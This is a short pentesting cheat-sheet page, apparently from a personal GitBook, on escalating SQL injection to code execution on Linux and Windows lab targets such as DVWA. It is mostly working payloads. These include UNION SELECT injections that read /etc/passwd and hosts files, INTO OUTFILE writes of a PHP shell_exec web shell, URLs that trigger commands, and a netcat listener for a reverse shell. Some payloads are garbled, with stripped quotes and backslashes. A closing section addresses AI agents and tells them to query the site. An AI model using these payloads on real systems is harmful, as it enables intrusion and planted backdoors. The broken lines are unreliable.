# SQLi to code execution

```
#Capitalized, unix  target

‘ UNION SELECT 1, load_file(/etc/passwd) #


#Using into OUTFILE fucntion to upload a webshell
Gotta find the webroot first, in this case we use /var/www

#inject:

'union select 1,’‘ INTO OUTFILE ‘/var/www/dvwa/cmd.php’ #

#Get command execution to further enumerate targets

http://11.11.11.11/dwa/cmd.php?cmd=id

#Using perl to get a reverse shell (use bash/python etc..)
Serve the reverse shell from kali /tmp using http.server

Trigger:

http://11.11.11.11/dwa/cmd.php?cmd=ls /tmp

Catch the revshell:

nc -nvlp 443

```

**#Windows targets**

```
Windows example:

#Using the load_file function 

....debug.php?id= union all select 1, 2, load_file('C:/Windows/System32/drivers/etc/hosts')

#Using the into OUTFILE function to get code execution
  
...debug.php?id=1 union all select 1, 2, "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/xampp/htdocs/backdoor.php'

#then trigger with

http://11.11.11.11/backdoor.php?cmd=ipconfig

#Get command execution, write a webshell into E drive
Webroot in example  c:/wamp/www/DVWA/dvwa/
Enumerate actual webroot location of target 

....id=‘ union select 1, load_file(‘e:testfile.txt’) #

‘ union select 1, ‘‘ INTO OUTFILE ‘c:wampwwwDVWAdvwacmd.php’#

#command execution

..dwa/cmd.php?cmd=dir

```

**#Practice the basics with**

{% embed url="<https://www.vulnhub.com/entry/damn-vulnerable-web-application-dvwa-107,43/>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://davidtancredi.gitbook.io/pentesting-notes/r3dcl1ff/webapp-pentest/sqli/sqli-manual-testing/sqli-to-code-execution.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.